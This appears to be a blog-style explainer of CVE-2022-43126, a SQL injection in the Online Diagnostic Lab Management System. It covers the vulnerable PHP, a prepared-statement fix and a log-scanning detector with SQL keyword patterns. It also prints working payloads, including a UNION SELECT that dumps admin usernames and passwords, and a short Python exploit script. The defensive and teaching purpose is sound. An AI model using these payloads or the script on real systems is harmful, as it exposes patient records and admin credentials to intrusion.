On October 29, 2022, the security community identified a critical SQL injection vulnerability in the Online Diagnostic Lab Management System v1. Cataloged as CVE-2022-43126, this bug allows attackers to access or manipulate the backend database using a specially crafted request. In plain terms, someone could view sensitive data, change information, or even erase records just by tricking the application into running SQL of their choosing.
In this long read, we'll break down how the vulnerability works, see example code, offer some references, and show how an attacker might exploit it—all in easy-to-read English.
What Is the Online Diagnostic Lab Management System?
The Online Diagnostic Lab Management System is a popular web-based platform that lets medical labs manage patient records, tests, results, and more. Version v1. is used by many small health centers for daily operations.
Where Is the SQL Vulnerability?
The problem lies in the way the application handles the id parameter in the admin dashboard, specifically at:
/admin/tests/manage_test.php?id=[USER_INPUT]
Instead of safely handling user input, the application takes whatever is passed as an id and includes it directly in an SQL query. If an attacker puts in extra data or SQL commands, the database will try to run them.
Let's take a look at what the vulnerable code may look like (simplified for clarity):
<?php
// Vulnerable Code Example
$id = $_GET['id']; // No input validation!
$query = "SELECT * FROM tests WHERE id = $id"; // INSECURE: user input is spliced straight into the SQL text
$result = mysqli_query($conn, $query);
?>
None of this input is sanitized or protected. If someone enters 1 OR 1=1 as their id, the whole table is returned.
How the Exploit Works
Let's imagine an attacker wants to pull all test records from the database. Instead of sending a normal request like:
/admin/tests/manage_test.php?id=2
They send:
/admin/tests/manage_test.php?id=1 OR 1=1
So the query becomes:
SELECT * FROM tests WHERE id = 1 OR 1=1
Since 1=1 is always true, this returns all records from the tests table.
Extracting Data
Attackers can also try to list database users, extract sensitive info, or even dump the whole database if error messages are shown or output is reflected.
Example of a UNION-based injection to dump admin usernames:
/admin/tests/manage_test.php?id=-1 UNION SELECT 1, username, password FROM admin_users--
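Because a legitimate id for this endpoint is always a plain integer, attempts like the ones above stand out in ordinary web-server logs. The following Python is an added example, not code from the original post or from the vendor: it parses a few constructed Apache-style access-log lines, extracts the id parameter for /admin/tests/manage_test.php, and flags any value that is not a bounded integer, noting whether it also contains SQL-like tokens. The log lines, client addresses and the WATCHED_PATH constant are constructed for the demo.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (Apache combined format); not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Oct/2022:10:01:02 +0000] "GET /admin/tests/manage_test.php?id=2 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Oct/2022:10:01:09 +0000] "GET /admin/tests/manage_test.php?id=1%20OR%201%3D1 HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Oct/2022:10:01:15 +0000] "GET /admin/tests/manage_test.php?id=-1%20UNION%20SELECT%201,username,password%20FROM%20admin_users-- HTTP/1.1" 200 2210 "-" "python-requests/2.28.1"
198.51.100.7 - - [29/Oct/2022:10:02:00 +0000] "GET /admin/tests/manage_test.php?id=17 HTTP/1.1" 200 1790 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Oct/2022:10:02:30 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, method, request target, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
WATCHED_PATH = "/admin/tests/manage_test.php"   # the vulnerable endpoint from the advisory
ID_OK = re.compile(r"^\d{1,10}$")                # a valid id is a plain, bounded integer
SQL_HINT = re.compile(r"\b(or|and|union|select|from)\b|--|/\*|'", re.IGNORECASE)


def classify_id(raw_id):
    """Return a reason string if the id value is suspicious, otherwise None."""
    # Decode once more so a double-encoded payload is judged on its real content.
    decoded = unquote_plus(raw_id)
    if ID_OK.match(decoded):
        return None
    if SQL_HINT.search(decoded):
        return "sql-like tokens in id"
    return "non-integer id"


def find_suspicious_requests(log_text):
    """Scan log lines and collect requests to the watched path whose id is not a clean integer."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != WATCHED_PATH:
            continue
        # parse_qs URL-decodes each value once; keep_blank_values keeps a bare "id=" visible.
        for raw_id in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            reason = classify_id(raw_id)
            if reason:
                hits.append({"ip": m["ip"], "time": m["ts"], "id": raw_id,
                             "reason": reason, "size": m["size"]})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} id={hit['id']!r} ({hit['reason']}, {hit['size']} bytes)")
```

Flagging on "not an integer" rather than on keywords alone is deliberate: it catches payloads that avoid the obvious words. The response size in the second sample line is a useful corroborating signal, since an id of 1 OR 1=1 returns the whole table and the page grows accordingly.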
A Sample Exploit Script
Here’s a simple Python script using the requests library to exploit this vulnerability and extract data:
import requests

url = "http://victim-website.com/admin/tests/manage_test.php"
payload = "1 OR 1=1"
full_url = f"{url}?id={payload}"

r = requests.get(full_url)
if "test record" in r.text:  # Adjust for known response content
    print("[!] Successfully exploited, page contains:")
    print(r.text)
else:
    print("[!] May not be vulnerable or payload needs tweaking.")
Responsible Disclosure
This vulnerability was publicly disclosed and assigned CVE-2022-43126. It was reported on various vulnerability trackers:
- Mitre CVE Entry
- Exploit Database Reference
- NVD Details
If you run this software, apply patches or contact the vendor for fixes.
Use prepared statements / parameterized queries
<?php
// Secure Code Example
$id = $_GET['id'];
// The placeholder keeps the SQL text fixed; user input can only ever arrive as a value
$stmt = $conn->prepare("SELECT * FROM tests WHERE id = ?");
$stmt->bind_param("i", $id); // "i" binds $id as an integer
$stmt->execute();
$result = $stmt->get_result();
?>
Or, at the very least, validate all user input before it reaches the query; for this endpoint, id should be accepted only when it is an integer.
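To make both the mechanism from "How the Exploit Works" and the prepared-statement fix concrete in one runnable place, here is an added Python example; it is not the project's own PHP code. It uses an in-memory SQLite table as a stand-in for the application's MySQL tests table (the rows are constructed). lookup_vulnerable splices the id into the SQL text the way the vulnerable PHP does, lookup_parameterized binds it as a value the way the fix does, and parse_id shows the integer check that input validation should perform before any query runs.

```python
import sqlite3


def make_db():
    """Build an in-memory stand-in for the application's 'tests' table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tests (id INTEGER PRIMARY KEY, name TEXT, result TEXT)")
    conn.executemany("INSERT INTO tests VALUES (?, ?, ?)", [
        (1, "CBC", "normal"),
        (2, "Lipid panel", "borderline"),
        (3, "HbA1c", "elevated"),
    ])
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirrors the vulnerable PHP: the raw id becomes part of the SQL text itself."""
    query = f"SELECT * FROM tests WHERE id = {user_id}"  # never do this with untrusted input
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_id):
    """Mirrors the prepared-statement fix: the SQL is fixed, the id travels as a bound value."""
    return conn.execute("SELECT * FROM tests WHERE id = ?", (user_id,)).fetchall()


def parse_id(raw):
    """Input validation for this endpoint: accept only a non-negative integer string."""
    if not raw.isdigit():
        raise ValueError(f"invalid id: {raw!r}")
    return int(raw)


def lookup_hardened(conn, raw_id):
    """Validation plus parameterization: the combination the advisory recommends."""
    return lookup_parameterized(conn, parse_id(raw_id))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=2      :", lookup_vulnerable(db, "2"))
    print("vulnerable, 1 OR 1=1  :", lookup_vulnerable(db, "1 OR 1=1"))   # whole table
    print("parameterized, 1 OR 1=1:", lookup_parameterized(db, "1 OR 1=1"))  # no rows
    print("hardened, id=2        :", lookup_hardened(db, "2"))
```

With the bound parameter, the string "1 OR 1=1" is compared against the integer id column as a value and matches nothing, so even without validation the table cannot be dumped; validation is still worth adding so that malformed ids are rejected early with a clear error instead of silently returning an empty result.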
Conclusion
CVE-2022-43126 is an example of how skipping basic security practices can lead to big risks. If you use Online Diagnostic Lab Management System v1., please update or patch your application, and always protect your database from untrusted input. Stay safe!
References
- Mitre CVE Entry
- Exploit-DB #51205
- NVD CVE Details
- OWASP SQL Injection
If you need help securing your systems, always reach out to a qualified professional.
Timeline
Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/01/2022 23:33:00 UTC